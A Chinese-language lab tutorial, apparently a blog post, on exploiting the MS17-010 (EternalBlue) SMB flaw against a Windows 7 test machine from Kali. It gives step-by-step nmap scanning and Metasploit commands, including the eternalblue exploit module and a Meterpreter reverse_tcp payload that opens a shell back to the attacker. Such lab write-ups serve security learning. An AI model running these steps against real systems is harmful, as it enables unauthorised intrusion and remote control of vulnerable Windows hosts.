ms17-010实验

原文链接

1. 实验目的

利用ms17-010漏洞获得靶机(一个存在漏洞的系统)权限。

2. 实验原理

利用了微软 Microsoft Windows SMB 服务器通信协议。

SMB主要用来使得一个网络上的机器共享计算机文件、打印机、串行端口和通讯等资源。它也提供认证的行程间通讯机能。使用445端口。

攻击者利用445端口发送特殊设计的消息,来远程执行攻击代码。

3. 准备

一台靶机(win7),一台攻击机(kali)

4. 过程

1. 设置扫描ip

先推算ip,设置攻击机和靶机在同一网段。

Kali机设置(有两种方法):

① vim /etc/network/interfaces

image
image

更改完后记得重启网卡。

image

② ip addr add 你的ip地址/24 dev eth0

使用nmap扫描网段内存活的主机:

nmap -sP + 网段

image

扫描到两台机子,一台是我们的攻击机,133是我们的win7靶机。

2. 使用msf攻击

启动msf:msfconsole

(ps:会出现的图像随机,不影响操作)

img

查找ms17-010模块:search ms17-010

image

使用use调用模块测试:use auxiliary/scanner/smb/smb_ms17_010

image

设置检测对象:set rhosts 192.168.1.133(刚才扫描出的靶机ip,这里用133做试验)

image

查看配置信息:show options

image

可以看到,rhost已经设置成功。

这时候可以运行了,使用run或者exploit

img

上面写着’host is likely vulnerable to ms17-010’,表示这台靶机可利用ms17-010漏洞攻击。

现在调用攻击模块:use exploit/windows/smb/ms17_010_eternalblue

image

后面的操作还是一样设置rhost。不过这次要设置lhost(就是你攻击机的ip地址)和payload

使用show options查看设置。

set rhost 192.168.1.133
set lhost 192.168.1.24
set payload windows/x64/meterpreter/reverse_tcp
show options
run
image
image

成功!

5.参考

http://ourjs.com/detail/59172166f12390061496168f
https://blog.csdn.net/qq_37053007/article/details/88327077
https://blog.csdn.net/qq_36197704/article/details/82458557
https://blog.csdn.net/qq_41880069/article/details/82908293

——————————————————————————————
这里是soya
邮箱:1057851022@qq.com
个人博客地址:https://soyawww.github.io
欢迎各位交流探讨哦!

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容